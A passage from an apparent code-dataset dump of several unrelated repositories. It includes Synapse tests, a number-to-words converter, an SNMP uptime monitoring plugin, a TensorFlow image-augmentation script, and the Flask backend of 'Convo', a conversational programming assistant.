"destination": "syn25871921"
}
def test_login():
assert type(utils._login_to_synapse()) is Synapse
def test_yaml():
# tests if a valid file renders a list
assert type(utils._get_config()) is list
# tests if a bad file will
with pytest.raises(SystemExit) as err:
utils._get_config(config_path="./tests/test_assets/bad_config.yaml")
assert err.type == SystemExit
assert err.value.code == 9
with pytest.raises(SystemExit) as err:
utils._get_config(config_path="./tests/test_assets/bad_config.yam")
assert err.type == SystemExit
assert err.value.code == 2
if __name__ == "__main__":
pytest.main()
```
|
{
"source": "Jesstin127/tugas-pertemuan-12",
"score": 4
}
|
#### File: Jesstin127/tugas-pertemuan-12/tugas-pertemuan-12.py
```python
kata = ['', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine',]
def num(n:int):
if n < 10 :
return kata[n]
elif n >= 1_000_000_000:
return num(n//1_000_000_000)+ ' billion '+ num(n%1_000_000_000)
elif n >= 1_000_000:
return num(n//1_000_000)+' million ' + num(n%1_000_000)
elif n>=1_000:
return num(n//1000) + ' thousand ' + num(n%1000)
elif n>=100:
return num(n//100)+ ' hundred ' + num(n%100)
elif n>=20:
if n//10 == 2:
return 'twenty ' + num(n%10)
elif n//10 == 3:
return 'thirty ' + num(n%10)
elif n//10 == 4:
return 'forty ' + num(n%10)
elif n//10 == 5:
return 'fifty ' + num(n%10)
else :
return num(n//10)+('ty 'if (n//10)!=8 else 'y ') + num(n%10)
else :
if n==10:
return 'ten'
elif n==11:
return 'eleven'
elif n==12:
return 'twelve'
elif n==13:
return 'thirteen'
elif n==15:
return 'fifteen'
else :
return num(n%10) + 'teen'
import os
while True:
os.system('cls')
print("NUMBERS CONVERTER INTO WORDS")
print("============================")
try:
bil=int(input("Number\t? "))
print(f"{bil:,} = {num(bil)}")
except:
print("INPUT MUST BE NUMBER !!!")
print()
print("Want to Convert Again [y/n] ? ",end='')
again=input()
print()
if again.lower() == 'n' :
break
```
|
{
"source": "jessux/centreon",
"score": 2
}
|
#### File: centreon/plugins/check_uptime.py
```python
import plac
import getopt
import sys
import re
from subprocess import Popen, PIPE
import datetime
SNMPGET_BIN = '/usr/bin/snmpget'
SNMP_ENGINE_OID = '.1.3.6.1.6.3.10.2.1.3.0'
SNMP_UPTIME_OID = '.1.3.6.1.2.1.1.3.0'
host=""
community=""
warning=0
critical=0
def get_uptime(host,community,warning,critical):
# first search the SNMP engine time OID
port = 161
status= 3
perfdata=""
message=""
method=""
mycode, stdout = snmpget(host, port, community, SNMP_ENGINE_OID)
match = re.search('INTEGER:\W*(\d+)\W*seconds',str(stdout))
if match:
uptime_sec = int(match.group(1))
method = 'engine'
else:
# no match, continue on to using the SysUpTime OID
mycode, stdout = snmpget(host, port, community, SNMP_UPTIME_OID)
#print stdout
match = re.search('Timeticks:\W*\((\d+)\)\W*', stdout)
if match:
uptime_sec = int(match.group(1)) / 100
method = 'sysUptime'
else:
message= 'CRITICAL: Unable to determine uptime'
status = 2
if method != "":
if uptime_sec < critical:
message = "CRITICAL: Uptime less than "+str(datetime.timedelta(seconds=critical))+" : is currently "+str(datetime.timedelta(seconds=uptime_sec))+" (SNMP method: "+method+")"
status = 2
elif uptime_sec < int(warning):
message = 'WARNING: Uptime less than '+str(datetime.timedelta(seconds=warning))+': is currently '+str(datetime.timedelta(seconds=uptime_sec))+' (method: '+method+')'
status = 1
else:
message = 'UPTIME OK: '+str(datetime.timedelta(seconds=uptime_sec))+' (method: '+method+')'
status = 0
perfdata = "'uptime_sec'="+str(datetime.timedelta(seconds=uptime_sec))+" seconds"
#print(message,perfdata,status)
return message,perfdata,status
def snmpget(host, port, community, oid):
snmpe = Popen([SNMPGET_BIN,'-v','2c','-c',community,host + ':' + str(port),oid], stdout=PIPE)
sout, serr = snmpe.communicate()
return (snmpe.returncode, sout)
def main(argv):
opts,args= getopt.getopt(argv,"hH:C:w:c:",["help","host","community","warning","critical"])
global host,community,warning,critical
for option,value in opts:
if option in ("-h","--help"):
sys.exit(0)
elif option in ("-H","--host"):
host=value
elif option in ("-C","--community"):
community=value
elif option in ("-w","--warning"):
warning=int(value)
elif option in ("-c","--critical"):
critical=int(value)
if __name__ == '__main__':
argv = sys.argv[1:]
main(argv)
message,perfdata,status = get_uptime(host,community,warning,critical)
print(message + "|" + perfdata)
sys.exit(status)
# snmp engine
# .1.3.6.1.6.3.10.2.1.3.0
# sysUptime
# .1.3.6.1.2.1.1.3.0
```
|
{
"source": "jessvb/3d_world_procedural_generation",
"score": 3
}
|
#### File: 3d_world_procedural_generation/useful_scripts/prepDataset.py
```python
import os
import tensorflow as tf
import random
import numpy as np
import matplotlib.pyplot as plt
# uncomment for inline for the notebook:
# %matplotlib inline
import pickle
# enter the directory where the training images are:
TRAIN_DIR = 'train/'
IMAGE_SIZE = 512
train_image_file_names = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)]
# to decode a single png img:
# graph = tf.Graph()
# with graph.as_default():
# file_name = tf.placeholder(dtype=tf.string)
# file1 = tf.read_file(file_name)
# image = tf.image.decode_png(file1)
# with tf.Session(graph=graph) as session:
# tf.global_variables_initializer().run()
# image_vector = session.run(image, feed_dict={
# file_name: train_image_file_names[1]})
# print(image_vector)
# session.close()
# method to decode many png images:
def decode_image(image_file_names, resize_func=None):
images = []
graph = tf.Graph()
with graph.as_default():
file_name = tf.placeholder(dtype=tf.string)
file1 = tf.read_file(file_name)
image = tf.image.decode_png(file1)
# , channels=3) <-- use three channels for rgb pictures
k = tf.placeholder(tf.int32)
tf_rot_img = tf.image.rot90(image, k=k)
# im_rot = tf.placeholder(tf.float32, shape=(IMAGE_SIZE, IMAGE_SIZE, 3))
tf_flip_img = tf.image.flip_left_right(tf_rot_img)
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
for i in range(len(image_file_names)):
for j in range(4): # rotation at 0, 90, 180, 270 degrees
rotated_img = session.run(tf_rot_img, feed_dict={
file_name: image_file_names[i], k: j})
images.append(rotated_img)
flipped_img = session.run(
tf_flip_img, feed_dict={
file_name: image_file_names[i], k: j})
images.append(flipped_img)
if (i+1) % 1000 == 0:
print('Images processed: ', i+1)
session.close()
return images
train_images = decode_image(train_image_file_names)
print('shape train: ', np.shape(train_images))
# Let's see some of the images
# for i in range(10,14):
# plt.imshow(train_images[i].reshape([IMAGE_SIZE,IMAGE_SIZE]), cmap=plt.get_cmap('gray'))
# plt.show()
# for rgb images:
# for i in range(10,20):
# plt.imshow(train_images[i])
# plt.show()
def create_batch(data, label, batch_size):
i = 0
while i*batch_size <= len(data):
with open(label + '_' + str(i) + '.pickle', 'wb') as handle:
content = data[(i * batch_size):((i+1) * batch_size)]
pickle.dump(content, handle)
print('Saved', label, 'part #' + str(i),
'with', len(content), 'entries.')
i += 1
# Create one hot encoding for labels
# labels = [[1., 0.] if 'dog' in name else [0., 1.] for name in train_image_file_names]
# these are all real images, so let's encode them all with 1's
labels = [[1., 0.] for name in train_image_file_names]
# TO EXPORT DATA WHEN RUNNING LOCALLY - UNCOMMENT THESE LINES
# a batch with 5000 images has a size of around 3.5 GB
# create_batch(labels, 'pickled/', np.shape(train_images)[0])
create_batch(train_images, 'pickled/', np.shape(train_images)[0])
print('done creating dataset')
```
|
{
"source": "jessvb/convo",
"score": 3
}
|
#### File: backend/server/db_manage.py
```python
import json
from app import logger, db
from datetime import datetime
from helpers import convert_to_object, convert_to_dict
class User(db.Model):
'''User model that is associated with Convo clients'''
id = db.Column(db.Integer, primary_key=True)
# Server ID of connected client
sid = db.Column(db.String(120), unique=True, nullable=False)
# Date when created
created_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
# Date when user last connected
connected_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
class Program(db.Model):
'''Program model that is currently representing procedures in Convo'''
id = db.Column(db.Integer, primary_key=True)
sid = db.Column(db.String(120), db.ForeignKey('user.sid'), nullable=False)
# Name of procedure
name = db.Column(db.String(80), nullable=False)
# JSON-encoded string of the procedure object
procedure = db.Column(db.Text, nullable=True)
# Date when created
created_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
# Date when updated
updated_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
def get_or_create_user(client):
'''Gets user based on client if exists, else creates a new user'''
user = User.query.filter_by(sid=client.id).first()
if user is None:
user = User(sid=client.id)
db.session.add(user)
else:
user.connected_on = datetime.utcnow()
db.session.commit()
return user
def from_db_program(program):
'''Convert Program DB model to a Procedure'''
return json.loads(program.procedure, object_hook=convert_to_object)
def get_procedures(sid):
'''Get all procedures of a client based on their sid'''
programs = Program.query.filter_by(sid=sid).all()
if not programs:
return {}
procedures = [(program.name, from_db_program(program)) for program in programs]
return dict(procedures)
def add_or_update_procedure(sid, procedure):
'''Add or update an existing procedure based on client's sid and procedure's id'''
encoded = json.dumps(procedure, default=convert_to_dict)
program = Program.query.filter_by(sid=sid, name=procedure.name).first()
if program is None:
program = Program(sid=sid, name=procedure.name, procedure=encoded)
db.session.add(program)
else:
program.procedure = encoded
program.updated_on = datetime.utcnow()
db.session.commit()
procedure.id = program.id
return program
def remove_procedure(sid, procedure):
'''Removes a procedure from database'''
program = Program.query.filter_by(sid=sid, name=procedure.name).first()
if not program:
return
db.session.delete(program)
db.session.commit()
```
#### File: backend/server/dialog.py
```python
from nlu import SemanticNLU
from rasa_nlu import RasaNLU
from question import QuestionAnswer
from models import *
from goals import *
from error import *
from helpers import *
from app import logger
state_machine = {
"home": {
"create_procedure": "creating",
"execute": "executing",
"edit": "editing",
"connect_intent": "editing"
},
"creating": {
"complete": "home"
},
"editing": {
"add_step": "editing_action",
"change_step": "editing_action",
"complete": "home"
},
"executing": {
"finish": "home"
},
"editing_action": {
"complete": "editing"
}
}
allowed_goals = {
"home": [HomeGoal, GetInputGoal],
"creating": [ActionGoal, GetActionsGoal, GetConditionGoal, GetInputGoal],
"editing": [StepGoal, GetInputGoal, ActionGoal, GetActionsGoal, GetConditionGoal],
"editing_action": [ActionGoal, GetActionsGoal, GetConditionGoal, GetInputGoal],
"executing": [GetUserInputGoal, GetInputGoal]
}
class DialogManager(object):
"""Represents a dialog manager for a client"""
def __init__(self, sid, port="5005", procedures={}):
self.sid = sid
self.port = port
self.context = DialogContext(sid, port, procedures)
self.qa = QuestionAnswer(self.context)
self.nlu = SemanticNLU(self.context)
self.rasa = RasaNLU(self.context)
def reset(self, context=None):
"""Resets the context either entirely or to a snapshot of another context"""
if context is not None:
# If a context is provided, set the context to the provided context
self.context = context
self.qa = QuestionAnswer(context)
self.nlu = SemanticNLU(context)
self.rasa = RasaNLU(context)
else:
self.context.reset()
logger.debug(f"[{self.sid}] Resetting the entire conversation.")
return "Conversation has been reset. What do you want to do first?"
@property
def immediate_goal(self):
"""Returns the immediate, lowest-level current goal"""
current = self.context.current_goal
while current and current.todos:
current = current.todos[-1]
return current
def current_goal(self):
"""Returns the current high-level goal, may contain other goals in its todos"""
return self.context.current_goal
def handle_message(self, message, isUnconstrained):
"""Handle messages by the client"""
self.context.add_message(message)
# Handle message indicating a reset
response = self.handle_reset(message)
if response is not None:
logger.debug(f"[{self.sid}] User resetted.")
return response
# If message indicates client needed help, return appropriate response
response = self.handle_help(message)
if response is not None:
logger.debug(f"[{self.sid}] User needed help.")
return response
# Handle messages received by server during program execution
if self.context.state == "executing":
logger.debug(f"[{self.sid}] Program is currently executing.")
return self.handle_execution(message)
# Handle message indicating a canceling of the immediate goal
response = self.handle_cancel(message)
if response is not None:
logger.debug(f"[{self.sid}] User canceled.")
return response
# Handle message that may be question and answer it
response = self.handle_question(message)
if response is not None:
logger.debug(f"[{self.sid}] User asked a question.")
return response
# If none of the above, parse the message for either a goal or slot-filling value
response = self.handle_parse(message, isUnconstrained)
if response is not None:
return response
return self.handle_goal()
def handle_reset(self, message):
"""Check for reset"""
if message.lower() == "reset":
return self.reset()
def handle_help(self, message):
"""Check for help"""
if message.lower() in ["help", "i need help"]:
return "Raise your hand and help will be on the way!"
def handle_execution(self, message):
"""Check if DM in stage of execution"""
execution = self.context.execution
if message.lower() in ["stop", "cancel"]:
# Stop execution if user commands it
execution.finish("Procedure has been stopped.")
elif execution.input_needed:
# If execution was paused to ask for user input, continue the execution with provided input
execution.run(message)
else:
# Do not allow any other action besides the two cases above
return "Procedure is still executing."
return
def handle_cancel(self, message):
"""
Check for cancellation
If cancel, cancels the lowest-level goal that is not a "Get Input" or "Get Condition" goal
For example, if the goal chain is "Add Step" -> "Create Variable" -> "Get Input", it will cancel "Create Variable"
"""
if message.lower() == "cancel":
previous = None
current = self.context.current_goal
while current and current.todos:
if isinstance(current.todos[-1], GetInputGoal) or isinstance(current.todos[-1], GetConditionGoal):
break
previous, current = current, current.todos[-1]
logger.debug(f"[{self.context.sid}] Canceling the current goal: {current}")
current.cancel()
if current is None:
return "You are not doing anything right now. What do you want to do?"
elif previous is None:
assert self.context.state == "home"
self.context.goals.pop()
return "Canceled! What do you want to do now?"
else:
previous.todos.pop()
return f"Canceled! {previous.message}"
def handle_question(self, message):
"""Check if message is a question and answer if it is"""
if QuestionAnswer.is_question(message):
logger.debug(f"Answering a potential question: {message}")
answer = self.qa.answer(message)
if answer is not None:
logger.debug(f"Question can be answered with: {answer}")
return answer
def handle_parse(self, message, isUnconstrained):
"""Parses the message"""
try:
if isUnconstrained:
goal = self.rasa.parse_message(message)
if goal is None:
goal = self.nlu.parse_message(message)
else:
goal = self.nlu.parse_message(message)
self.context.parsed = goal
except InvalidStateError as e:
response = "I can't do this right now"
if isinstance(e.goal, ActionGoal):
logger.debug(f"[{self.sid}] Invalid state to do action because currently not creating or editing a procedure.")
response += " because I am currently not creating or editing a procedure"
elif isinstance(e.goal, StepGoal):
if e.state == "editing_action":
logger.debug(f"[{self.sid}] Invalid state to do action because currently adding or editing an action.")
response += " because I am currently adding or editing an action"
else:
logger.debug(f"[{self.sid}] Invalid state to do action because currently not editing a procedure.")
response += " because I am currently not editing a procedure"
elif isinstance(e.goal, HomeGoal):
if e.state == "creating":
logger.debug(f"[{self.sid}] Invalid state to do action because currently creating a procedure.")
response += " because I am currently creating a procedure. You can stop by saying \"done\""
elif e.state == "editing":
logger.debug(f"[{self.sid}] Invalid state to do action because currently editing a procedure.")
response += " because I am currently editing a procedure. You can stop by saying \"done\""
elif e.state == "editing_action":
logger.debug(f"[{self.sid}] Invalid state to do action because adding or editing an action.")
response += " because I am currently adding or editing an action. Finish editing then you can stop by saying \"done\""
else:
logger.debug(f"[{self.sid}] Invalid state to do action.")
return f"{response}."
def handle_goal(self):
"""
Advances and updates the context based on the current received message
"""
if self.current_goal() is None:
# If a current goal does not exist at the moment current message is received
goal = self.context.parsed
if goal is None or not isinstance(goal, BaseGoal):
logger.debug(f"[{self.sid}] Did not understand utterance: {self.context.current_message}")
response = "I didn't understand what you were saying. Please try again."
elif goal.error is not None:
# If parsed goal has an error, respond to client
response = goal.error
elif goal.is_complete:
# If parsed goal can already be completed, complete the goal and respond to client
response = goal.complete()
else:
# Add parsed goal to the current context and respond to client about the goal
response = goal.message
self.context.add_goal(goal)
else:
# If there is a current goal, advance the current goal
goal = self.current_goal()
goal.advance()
if goal.error is not None:
# If current goal has an error, remove the goal and respond to client
response = goal.error
self.context.goals.pop()
elif goal.is_complete:
# If current goal can be completed, complete the goal and respond to client
response = goal.complete()
self.context.goals.pop()
else:
response = goal.message
return response
def handle_train(self, intents):
"""
Prompts the user to connect or create procedures for each intent that was trained.
"""
logger.debug(f"[{self.sid}] Finished training the following intents: {intents}.")
return f"You've finished training the intents: {intents}! Please connect it to the procedure you want to execute when the intent is recognized by saying \"connect the intent [intent name] to the procedure [procedure name]\"."
class DialogContext(object):
"""
Contains context and information needed to process messages and maintain conversations
More specifically, contains the classes, procedures, intents (and entities), state, conversation, goals
and execution/editing subcontexts for the client
"""
def __init__(self, sid, port, procedures={}):
self.sid = sid
self.rasa_port = port
self.classes = {}
self.procedures = procedures
self.execution = None
self.intents = {} # maps intent name to a list of required entities
self.intent_to_procedure = {} # maps intent name to a procedure that it is linked to
self.entities = {} # maps entities to their respective values, if given
self.reset()
@property
def current_message(self):
"""Retrieves the latest message of the conversation"""
return self.conversation[-1].lower() if self.conversation else None
@property
def current_goal(self):
"""Retrives the current top-level goal"""
return self.goals[-1] if self.goals else None
def reset(self):
"""Resets the context"""
if self.execution is not None:
self.execution.finish()
self.state = "home"
self.conversation = []
self.goals = []
self.current = None
self.execution = None
self.edit = None
def add_message(self, message):
self.conversation.append(message)
def add_goal(self, goal):
self.goals.append(goal)
def add_class(self, klass):
self.classes[klass.name] = klass
def add_procedure(self, procedure):
self.procedures[procedure.name] = procedure
def add_intent(self, intent, entities):
self.intents[intent] = entities
for entity in entities:
self.entities[entity] = None
def add_entity(self, entity, value):
self.entities[entity] = value
def get_class(self, name):
return self.classes.get(name)
def validate_goal(self, goal):
"""Check if goal is allowed in the current state of the context"""
allowed = any([type(goal) == goaltype or isinstance(goal, goaltype) for goaltype in allowed_goals[self.state]])
if not allowed:
raise InvalidStateError(goal, self.state)
def transition(self, action):
"""Transition state given the action"""
self.state = state_machine[self.state][str(action)]
```
#### File: server/goals/loop.py
```python
from app import logger
from goals import *
from models import *
class LoopActionGoal(ActionGoal):
"""Goal for adding a loop action"""
def __init__(self, context, loop=None, condition=None, action=None):
super().__init__(context)
self.loop_actions = []
self.todos = [GetLoopActionsGoal(self.context, self.loop_actions)]
self.setattr("action", action)
self.setattr("condition", condition)
self.setattr("loop", loop)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(LoopAction(self.loop, self.condition, self.loop_actions))
return super().complete()
def advance(self):
logger.debug(f"Advancing {self.__class__.__name__}...")
self._message = None
if self.todos:
todo = self.todos.pop()
todo.advance()
if todo.error:
if isinstance(todo, GetConditionGoal):
self.error = todo.error
else:
self._message = todo.error
return
if todo.is_complete:
todo.complete()
else:
self.todos.append(todo)
def setattr(self, attr, value):
if attr == "action" and value:
setattr(value, "actions", self.loop_actions)
if value.error:
self.error = value.error
elif value.is_complete:
value.complete()
else:
self.todos[0].todos.append(value)
return
elif attr == "condition":
if value is None:
self.todos.append(GetConditionGoal(self.context, self))
elif isinstance(value, UntilStopCondition):
self.loop = "until"
self.condition = value
elif value.variable.variable not in self.variables:
self.error = f"Variable {value.variable.variable} used in the condition hasn't been created yet. Please try again or create the variable first."
elif isinstance(value.value, ValueOf) and value.value.variable not in self.variables:
self.error = f"Variable {value.value.variable} used in the condition hasn't been created yet. Please try again or create the variable first."
elif isinstance(value, ComparisonCondition):
if isinstance(value.value, str):
if value.value in self.variables:
value.value = ValueOf(value.value)
self.condition = value
else:
self.error = f"The value {value.value} is not a number, so I cannot compare. Please try again."
else:
self.condition = value
else:
self.condition = value
return
elif attr == "loop":
assert value is not None
self.loop = value
return
setattr(self, attr, value)
```
#### File: server/goals/say.py
```python
from models import *
from goals import *
class SayActionGoal(ActionGoal):
"""Goal for adding a say action"""
def __init__(self, context, say_phrase=None):
super().__init__(context)
self.setattr("phrase", say_phrase)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(SayAction(self.phrase))
return super().complete()
def setattr(self, attr, value):
if attr == "phrase":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What do you want me to say?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable, {value.variable}, hasn't been created. Try using an existing variable if you want to try again."
return
self.phrase = value
else:
self.phrase = value
return
setattr(self, attr, value)
```
#### File: server/goals/variable.py
```python
from models import *
from goals import *
class CreateVariableActionGoal(ActionGoal):
"""Goal for adding a create variable action"""
def __init__(self, context, variable_name=None, variable_value=None, prepend=False):
super().__init__(context)
self.prepend = prepend
self.setattr("value", variable_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
if self.prepend:
self.actions.insert(0, CreateVariableAction(self.name, self.value))
else:
self.actions.append(CreateVariableAction(self.name, self.value))
self.variables.add(self.name)
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What do you want to call the variable?"))
elif value in self.variables:
self.error = f"The name, {value}, has already been used. Try creating a variable with another name."
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What should be the initial value?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable, {value}, hasn't been created yet. Try setting it to the value of an existing variable."
else:
self.value = value
else:
self.value = value
return
setattr(self, attr, value)
class SetVariableActionGoal(ActionGoal):
"""Goal for adding a set variable action"""
def __init__(self, context, variable_name=None, variable_value=None):
super().__init__(context)
self.setattr("value", variable_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(SetVariableAction(self.name, self.value))
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What variable do you want to set?"))
elif value not in self.variables:
self.error = f"Variable, {value}, hasn't been created, so we can't set it yet. You can create it by saying, \"create a variable called {value}.\""
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What value do you want to set the variable to?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable, {value}, hasn't been created yet. Try setting it to the value of an existing variable."
else:
self.value = value
else:
self.value = value
return
setattr(self, attr, value)
class AddToVariableActionGoal(ActionGoal):
"""Goal for adding a add to variable action"""
def __init__(self, context, variable_name=None, add_value=None):
super().__init__(context)
self.setattr("value", add_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(AddToVariableAction(self.name, self.value))
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What variable do you want to add to?"))
elif value not in self.variables:
self.error = f"The variable, {value}, hasn't been created so there is nothing to add to. Try creating the variable first."
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What value do you want to add to the variable?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable {value} does not exist. Try setting it to the value of an existing variable."
else:
self.value = value
elif isinstance(value, str):
self.todos.append(GetInputGoal(self.context, self, attr, f"The value, {value}, isn't a number. Can you try again?"))
else:
self.value = value
return
class SubtractFromVariableActionGoal(ActionGoal):
"""Goal for adding a subtract from variable action"""
def __init__(self, context, variable_name=None, subtract_value=None):
super().__init__(context)
self.setattr("value", subtract_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(SubtractFromVariableAction(self.name, self.value))
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What variable do you want to subtract from?"))
elif value not in self.variables:
self.error = f"The variable, {value}, hasn't been created so there is nothing to subtract it. Try creating the variable first."
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What value do you want to subtract from the variable?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable {value} does not exist. Try setting it to the value of an existing variable."
else:
self.value = value
elif isinstance(value, str):
self.todos.append(GetInputGoal(self.context, self, attr, f"Not a number. Try again."))
else:
self.value = value
return
```
#### File: server/models/action.py
```python
from helpers import to_snake_case
from models.valueof import ValueOf
tab = " "
class Action(object):
"""Represents an action in a procedure"""
def __init__(self):
raise NotImplementedError
def __str__(self):
name = self.__class__.__name__
return to_snake_case(name[:-len("Action")])
def json(self):
return { "name": str(self) }
def python(self):
raise NotImplementedError
def to_nl(self):
raise NotImplementedError
def __eq__(self, other):
raise NotImplementedError
class SetPropertyAction(Action):
def __init__(self, property, value):
self.property = property
self.value = value
def json(self):
return {
"name": str(self),
"property": self.property,
"value": self.value
}
def python(self):
return [f"{self.property} = {self.value}"]
def to_nl(self):
return f"setting property {self.property} to {self.value}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.property == other.property and self.value == other.value
class VariableAction(Action):
def __init__(self, variable, value):
self.variable = variable
self.value = value
def json(self):
return {
"name": str(self),
"variable": self.variable,
"value": self.value
}
def python(self):
return [f"{self.variable} = {self.value}"]
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.value == other.value
class CreateVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"creating a variable called {self.variable} and setting its value to {self.value}"
class SetVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"setting the value of variable {self.variable} to {self.value}"
class AddToVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def python(self):
return [f"{self.variable} += {self.value}"]
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"adding {value} to variable {self.variable}"
class SubtractFromVariableAction(VariableAction):
def __init__(self, variable, value):
super().__init__(variable, value)
def python(self):
return [f"{self.variable} -= {self.value}"]
def to_nl(self):
value = self.value.to_nl() if isinstance(self.value, ValueOf) else self.value
return f"subtracting {value} from variable {self.variable}"
class SayAction(Action):
def __init__(self, phrase):
self.phrase = phrase
def json(self):
return {
"name": str(self),
"phrase": self.phrase
}
def python(self):
return [f"say(\"{self.phrase}\")"]
def to_nl(self):
if isinstance(self.phrase, ValueOf):
return f"saying the value of the variable {self.phrase.variable}"
return f"saying the phrase \"{self.phrase}\""
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.phrase.lower() == other.phrase.lower()
class ConditionalAction(Action):
def __init__(self, condition, actions):
self.condition = condition
self.actions = actions
def json(self):
return {
"name": str(self),
"condition": str(self.condition),
"actions_true": [a.json() for a in self.actions[1]],
"actions_false": [a.json() for a in self.actions[0]]
}
def python(self):
lines = [f"if {str(self.condition)}:"]
lines.extend([f"{tab}{line}" for action in self.actions[1] for line in action.python()])
lines.append("else:")
lines.extend([f"{tab}{line}" for action in self.actions[0] for line in action.python()])
return lines
def to_nl(self):
falses, trues = self.actions
if len(trues) == 1 and \
not isinstance(trues[0], ConditionalAction) and \
(len(falses) == 0 or (len(falses) == 1 and not isinstance(falses[0], ConditionalAction))):
nl = f"{trues[0].to_nl()} if {self.condition.to_nl()}"
if len(falses) == 1:
nl += f" else I am {falses[0].to_nl()}"
return nl
num_falses = len(falses) if len(falses) > 0 else 'no'
num_trues = len(trues) if len(trues) > 0 else 'no'
return f"doing {num_trues} action(s) when {self.condition.to_nl()} and {num_falses} action(s) otherwise"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.condition == other.condition and self.actions[0] == other.actions[0] and self.actions[1] == other.actions[1]
class LoopAction(Action):
def __init__(self, loop, condition, actions):
self.loop = loop
self.condition = condition
self.actions = actions
def json(self):
return {
"name": str(self),
"loop": self.loop,
"condition": str(self.condition),
"actions": [a.json() for a in self.actions]
}
def to_nl(self):
num_actions = str(len(self.actions)) if len(self.actions) > 0 else 'no'
return f"doing {num_actions} action{'s' if num_actions != '1' else ''} in a loop {self.loop} {self.condition.to_nl()}"
def python(self):
if self.loop == "while":
lines = [f"while {str(self.condition)}:"]
lines.extend([f"{tab}{line}" for action in self.actions for line in action.python()])
return lines
raise NotImplementedError
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.loop == self.loop and self.condition == other.condition and self.actions == self.actions
class CreateListAction(Action):
def __init__(self, name):
self.name = name
def json(self):
return {
"name": str(self),
"list": self.name
}
def python(self):
return [f"{self.name} = []"]
def to_nl(self):
return f"creating a list called {self.name}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.name == self.name
class AddToListAction(Action):
def __init__(self, name, value):
self.name = name
self.value = value
def json(self):
return {
"name": str(self),
"list": self.name,
"value": self.value
}
def python(self):
return [f"{self.name}.append({self.value})"]
def to_nl(self):
return f"adding {self.value} to list {self.name}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.name == other.name and self.value == other.value
class AddToListPropertyAction(Action):
def __init__(self, property, value):
self.property = name
self.value = value
def json(self):
return {
"name": str(self),
"property": self.property,
"value": self.value
}
def python(self):
return [f"{self.property}.append({self.value})"]
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.property == other.property and self.value == other.value
class GetUserInputAction(Action):
def __init__(self, variable, prompt):
self.variable = variable
self.prompt = prompt
def json(self):
return {
"name": str(self),
"variable": self.variable,
"prompt": self.prompt
}
def to_nl(self):
return f"listening for input and saving it as {self.variable}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.prompt == other.prompt
class PlaySoundAction(Action):
def __init__(self, sound):
self.sound = sound
def json(self):
return {
"name": str(self),
"sound": self.sound
}
def to_nl(self):
return f"playing the sound file {self.sound}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.sound == other.sound
```
#### File: server/models/condition.py
```python
from error import *
from models import *
class Condition(object):
"""Represents a condition"""
def __init__(self):
pass
def __str__(self):
return "condition"
class SayCondition(Condition):
def __init__(self, phrase):
self.phrase = phrase
def eval(self, phrase):
return self.phrase == phrase
def __str__(self):
return f"'{self.phrase}'"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.phrase == other.phrase
comparison_ops = {
"greater than": ">",
"less than": "<",
"greater than or equal to": ">=",
"less than or equal to": "<="
}
class UntilStopCondition(Condition):
"""Loop-only condition that stops the loop only if user says stop"""
def eval(self):
return True
def __str__(self):
return "you say 'stop'"
def to_nl(self):
return self.__str__()
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return True
class EqualityCondition(Condition):
